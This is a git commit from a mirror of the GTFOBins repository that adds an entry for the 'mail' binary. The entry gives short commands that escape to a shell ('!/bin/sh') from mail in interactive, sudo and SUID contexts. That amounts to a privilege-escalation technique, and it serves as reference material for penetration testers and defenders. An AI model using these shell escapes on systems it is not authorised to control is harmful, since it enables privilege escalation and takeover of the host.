mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add mail
This commit is contained in:
parent
5e0da38a4a
commit
4fbd4d3ab7
15
_gtfobins/mail.md
Normal file
15
_gtfobins/mail.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
execute-interactive:
|
||||||
|
- code: |
|
||||||
|
mail -f /etc/hosts
|
||||||
|
!/bin/sh
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
sudo mail -f /etc/hosts
|
||||||
|
!/bin/sh
|
||||||
|
suid-limited:
|
||||||
|
- code: |-
|
||||||
|
./mail -f /etc/hosts
|
||||||
|
!/bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user